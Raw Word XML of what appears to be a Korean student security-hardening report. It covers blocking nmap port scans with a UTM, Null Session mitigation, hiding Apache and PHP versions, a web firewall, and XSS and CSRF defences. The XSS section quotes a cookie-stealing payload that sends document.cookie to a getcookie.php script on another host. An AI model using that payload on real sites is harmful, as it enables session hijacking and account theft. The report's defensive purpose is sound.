        <w:t>갈취해 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 xml:space="preserve">을 알게 되면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 여러 설정들을 공격자가 원하는 대로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생성이 가능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nm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nma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Onesixtyone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 xml:space="preserve">사이에서 통신하는 내용을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 xml:space="preserve">하는 </w:t>
      </w:r>
      <w:r w:rsidR="007E7475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만약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가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 xml:space="preserve">P프로토콜을 사용 중이라면 공격자는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 서로 통신하는 내용을 세부적으로 볼 수 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와이어 샤크로 확인해보면 아이디와 컴퓨터 이름을 볼 수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보안 설정</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009E6C11" w:rsidRPr="00E151D6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 xml:space="preserve">새로 구성된 토폴로지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 xml:space="preserve">서버로 접속 시 서버 네트워크인 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">10.10.200.0/24 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>대역대를</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 할당 받게 되어 </w:t>
      </w:r>
      <w:r>
        <w:t>VPN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>서버를 별개의 네트워크로 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 들어오는 T</w:t>
      </w:r>
      <w:r>
        <w:t>raffic</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">을 검사하고 공격으로 의심되는 </w:t>
      </w:r>
      <w:r>
        <w:t>Traffic</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">을 차단하기 위해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내부 망에 접근해 서버 네트워크로 공격이 들어오는 것을 확인하기 위해 서버 네트워크에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</w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009E6C11" w:rsidRPr="00E151D6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>발견된 취약점에 대한 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 xml:space="preserve">현황 </w:t>
      </w:r>
      <w:r w:rsidR="00144CF8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>점검 보안 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 xml:space="preserve">계정 정책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 정책 및 계정 잠금 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 xml:space="preserve">윈도우 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최대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길이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초기화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 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>entOS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 계정 잠금 임계</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 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길이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 포함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대 암호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암호 만료 경고 날짜는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 쉽게 추측하기 어렵도록 변경하고 설명도 제거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 사용할 계정을 별도로 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 감사 정책이 설정되어 있지 않았던 윈도우 서버에서 개체 액세스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 관련 감사만 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 일정 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 서버는 볼륨 전체에 대한 백업 일정을,</w:t>
      </w:r>
      <w:r w:rsidRPr="00144CF8">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00144CF8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">는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 xml:space="preserve">나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 따로 백업 일정을 설정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 xml:space="preserve">설정 시간은 사용 빈도가 낮을 것으로 예상되는 오전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 xml:space="preserve">시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F53793" w:rsidRDefault="00924F61" w:rsidP="00FF1A4D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FF1A4D">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
      <w:r w:rsidR="00FF1A4D" w:rsidRPr="00FF1A4D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">시스템보안 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FF1A4D" w:rsidRPr="00FF1A4D" w:rsidRDefault="00FF1A4D" w:rsidP="00FF1A4D">
      <w:pPr>
        <w:pStyle w:val="af0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Host Scanning</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FF1A4D" w:rsidRDefault="00FF1A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1A4D" w:rsidRDefault="00FF1A4D" w:rsidP="00FF1A4D">
      <w:pPr>
        <w:pStyle w:val="af0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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ort Scanning</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FF1A4D" w:rsidRDefault="00FF1A4D" w:rsidP="00FF1A4D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58998" cy="947651"/>
            <wp:effectExtent l="0" t="0" r="3810" b="508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포트 스캐닝 차단 설정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29" cy="9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4D" w:rsidRDefault="00374C26" w:rsidP="00FF1A4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Port S</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidR="00EC5E68" w:rsidRPr="00EC5E68">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>canning</w:t>
      </w:r>
      <w:r w:rsidR="00EC5E68" w:rsidRPr="00EC5E68">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">방어를 위해 </w:t>
      </w:r>
      <w:r w:rsidR="00FF1A4D" w:rsidRPr="00EC5E68">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>UTM</w:t>
      </w:r>
      <w:r w:rsidR="00EC5E68" w:rsidRPr="00EC5E68">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">에서 </w:t>
      </w:r>
      <w:r w:rsidR="00EC5E68" w:rsidRPr="00EC5E68">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Anti-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00EC5E68" w:rsidRPr="00EC5E68">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Portscan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00EC5E68" w:rsidRPr="00EC5E68">
        <w:rPr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 xml:space="preserve">을 켬 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6604" cy="1088968"/>
            <wp:effectExtent l="0" t="0" r="635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nmap -sT 192.168.52.234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9" cy="1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310400"/>
            <wp:effectExtent l="0" t="0" r="254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로그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>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Nmap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툴의 </w:t>
      </w:r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sT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옵션을 사용해서 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Port Scanning</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>을 했을 때 모든 포트를 찾지 못하는 것을 볼 수 있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공격한 내용을 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>UTM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>에서 로그로 확인 가능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155600"/>
            <wp:effectExtent l="0" t="0" r="2540" b="698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nmp-sF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860" cy="1404851"/>
            <wp:effectExtent l="0" t="0" r="2540" b="508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nmap -sF 로그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6" cy="1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>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">의 다른 옵션인 </w:t>
      </w:r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sF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>를 사용해봐도 포트를 찾지 못함,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> UTM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>에서 로그로 확인 가능</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC5E68" w:rsidRDefault="00EC5E68" w:rsidP="00EC5E68">
      <w:pPr>
        <w:pStyle w:val="af0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34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lastRenderedPageBreak/>
        <w:t>Null Session</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC5E68" w:rsidRDefault="00EC5E68" w:rsidP="00EC5E68">
      <w:pPr>
        <w:ind w:left="8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582" cy="1330036"/>
            <wp:effectExtent l="0" t="0" r="3175" b="381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null session 대응방법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84" cy="1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943" cy="2377440"/>
            <wp:effectExtent l="0" t="0" r="3810" b="381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ullsession 체크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40" cy="23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621" cy="2585258"/>
            <wp:effectExtent l="0" t="0" r="3810" b="5715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nullsession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2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FE" w:rsidRDefault="00C52CFE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icro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oft </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">페이지에서 확인했을 때 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Everyone </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>사용 권한을 익명 사용자에게 적용을 사용 안 함으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명명된 파이프와 공유에 대한 익명 액세스 제한 속성을 사용으로 설정하면 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Null Session</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">을 탈취당하지 않을 수 있음 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="af4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:footnoteReference w:id="1"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F53793" w:rsidRDefault="00F53793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lastRenderedPageBreak/>
        <w:t>웹 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안 장비 설정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해킹의 경우 웹 방화벽을 설정해서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 xml:space="preserve">을 거쳐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 이동하도록 설정하면 대부분의 공격을 방지할 수 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 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 방화벽으로 웹 서비스를 요청하면 실제로 서비스를 제공할 서버 정보를 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 서버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 방화벽을 적용하여 보안에 사용할 가상의 서버를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 xml:space="preserve">방화벽 프로파일은 미리 작성되어 잇는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 xml:space="preserve">현재는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 파일에 의해서 제한이 되어 있는 듯 하지만,</w:t>
      </w:r>
      <w:r w:rsidRPr="00144CF8">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00144CF8">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>etc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httpd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conf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httpd.conf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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파일을 통해서도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접근 제한이 가능</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00924F61" w:rsidRDefault="00924F61">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:br w:type="page"/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 버전 정보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924F61" w:rsidRDefault="00C67042" w:rsidP="00924F61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etc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httpd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conf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httpd.conf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옵션을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 설정 후 확인해보면 아파치 버전 정보가 숨겨진 것을 확인할 수 있음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t xml:space="preserve">PHP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>버전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etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C67042">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">/php.ini </w:t>
      </w:r>
      <w:r w:rsidRPr="00C67042">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">파일에서 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C67042">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>expose_php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 xml:space="preserve">값을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 xml:space="preserve">로 설정 후 확인하면 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C67042">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>php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버전 정보가 보이지 않는 것을 볼 수 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lastRenderedPageBreak/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웹 </w:t>
      </w:r>
      <w:r w:rsidRPr="00502E0B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">서비스 기본 경로인 </w:t>
      </w:r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var</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00502E0B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">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 xml:space="preserve">에서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 제거</w:t>
      </w:r>
      <w:r w:rsidRPr="00502E0B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">한 </w:t>
      </w:r>
      <w:r w:rsidRPr="00502E0B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>뒤 다시 공격해보면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접근이 금지된 것을 확인 가능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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00502E0B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidRPr="00502E0B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>tc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httpd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conf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httpd.conf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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파일에서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 xml:space="preserve">옵션을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 xml:space="preserve">로 설정하면 상세하게 서버 정보를 보여주던 부분이 더 이상 보이지 않는 것을 확인할 수 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">있고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 하단에 보이던 아파치 버전도 숨겨짐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 xml:space="preserve">a를 이용한 공격이 제대로 이루어지지 않고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 의한 공격이 있었다는 로그가 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 경우 요청의 빈도에 의해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 탐지할 수 있음</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00924F61" w:rsidRDefault="00924F61">
      <w:r>
        <w:br w:type="page"/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 공격이 제대로 이루어 지지 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 금지 되었다는 페이지를 확인할 수 있고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 xml:space="preserve">로그를 확인하면 요청한 내용이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 탐지되어 방어 되었다는 기록을 확인할 수 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 xml:space="preserve">공격 탐지는 웹 서버가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 xml:space="preserve">통신을 이용하기 때문에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 암호화되어 탐지 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 xml:space="preserve">장비의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 이용해 내부 네트워크는 암호화하지 않은 통신을 한다면 위 사진과 같은 결과를 확인 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취약점의 경우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 통해서 방지할 수 있는데 웹 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작성된 파일의 코드 내에서 악성 스크립트 공격에 이용될 수 있는 글자를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으로 바꿔주면서 스크립트 코드가 실행이 되지 않고 그 코드 글자 그대로를 저장하고 출력할 수 있도록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입력 받은 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009C7634">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>strContent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009C7634">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">에서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 xml:space="preserve">를 </w:t>
      </w:r>
      <w:r w:rsidRPr="009C7634">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009C7634">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;script</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009C7634">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&amp;gt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009C7634">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r w:rsidRPr="009C7634">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">로 </w:t>
      </w:r>
      <w:r w:rsidRPr="009C7634">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">html </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009C7634">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Encodin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009C7634">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">해서 저장하거나 아니면 저장된 텍스트를 받을 때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 해서 화면에 보여주도록 할 수도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위에서 작성한 코드로는 대문자로 이루어졌거나 대소문자가 섞인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 xml:space="preserve">태그와 같이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처리를 우회하는 공격은 처리할 수 없기 때문에 공격 가능성이 있는 텍스트를 확인해서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할 수 있는 작업이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 구분 없이,</w:t>
      </w:r>
      <w:r w:rsidRPr="009C7634">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> replace(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009C7634">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>strContent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009C7634">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>, "&lt;script&gt;", "&amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009C7634">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>lt</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009C7634">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;script</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009C7634">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&amp;gt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009C7634">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">;", 1, -1, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009C7634">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>vbTextCompare</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009C7634">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>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공격이 가능한 스크립트 코드에 대한 정보는 관련 사이트를 참고해서 서비스에 영향이 없는 선에서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을 해줄 필요가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2"/>
      </w:r>
      <w:r w:rsidRPr="009C7634">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> (ex. &lt;body </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009C7634">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>onload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009C7634">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> = "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009C7634">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>i.src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009C7634">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> = 'http://10.10.10.20/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009C7634">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>getcookie.php</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009C7634">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>?cookie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009C7634">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> = '+</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009C7634">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>document.cookie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009C7634">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">"&gt; 과 </w:t>
      </w:r>
      <w:r w:rsidRPr="009C7634">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">같이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 없이도 공격 가능한 코드를 작성할 수 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사진에서 알 수 있듯이</w:t>
      </w:r>
      <w:r w:rsidRPr="00AC03BE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 마찬가지로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 xml:space="preserve">공격도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 xml:space="preserve">를 이용한 공격으로 간주 방어가 되는 것을 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>확인 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 xml:space="preserve">와 마찬가지로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 xml:space="preserve">통신 때문에 암호화되어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 확인 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 이용하면 위 사진과 같은 결과를 확인 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lastRenderedPageBreak/>
        <w:t xml:space="preserve">일단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 xml:space="preserve">취약점이 있는 경우 스크립트를 통해서 사용자 권한을 악용한 요청을 실행할 수 있기 때문에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 없는지 확인하는 것도 필요하지만 충분하지는 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세션 정보와 서비스 요청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 등을 사용해서 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클라이언트로부터 전달된 세션 토큰 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009C7634">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>진위성을</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009C7634">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 확인하는 방법도 있겠지만 보편적으로 사용하기에는 실효성이 떨어지고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 환경에서 적용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 노출되어 있는 서비스의 경우 서비스 요청에 필요한 조건이 없거나 세션 정보만을 이용할 때 공격이 가능하기 때문에 서비스 요청을 할 때 전화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 xml:space="preserve">같은 재 인증을 요구하는 방법도 있지만 사용자 입장에서 귀찮은 작업이 많아지고 사소한 작업마다 인증하는 것은 서비스 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009C7634">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>접근성을</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009C7634">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 떨어뜨리기 때문에 불편함을 감수할 만큼 민감한 정보를 다루는 금융 관련 서비스 같은 요청에서 적용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회원 정보 수정과 같은 민감한 정보를 수정하는 경우 자신의 비밀번호를 다시 한번 입력하게 해서 본인 여부를 확인하거나 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009C7634">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>captcha</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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등을 활용해서 정상적인 경로를 통한 요청에서만 확인할 수 있는 랜덤으로 생성되는 확인 문자를 검사한 뒤 정상적인 요청으로 판단되는 경우만 요청을 처리하도록 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 xml:space="preserve">방식보다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이 권장되기는 하지만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도 보고서에서 확인한 것처럼 암호화 통신이 되어 있지 않은 경우 전달하는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 xml:space="preserve">가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 이용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또한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 있는 정보를 통해서도 정상적인 경로인지 확인할 수 있는데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에 포함되는 정보가 노출되는 것을 방지하기 위해서 브라우저에 따라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 xml:space="preserve">헤더를 제거하고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 xml:space="preserve">을 전송하는 경우도 있어서 보안에 무게를 두고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를 통해서 접근을 제한을 할 지 아니면 다수의 브라우저와의 호환성을 위해서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 제한을 두지 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 환경에 따라서 결정할 필요가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 입장에서는 자신의 권한이 의도하지 않은 요청에 사용되지 않도록 계정을 사용한 뒤에 반드시 로그아웃을 하는 것이 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 xml:space="preserve">제한 </w:t>
      </w:r>
      <w:r>
        <w:t>Secure Coding</w:t>
      </w:r>
      <w:r w:rsidRPr="009C7634">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 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 xml:space="preserve">를 통해서 서비스 요청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 xml:space="preserve">에 포함된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 xml:space="preserve">헤더 정보를 </w:t>
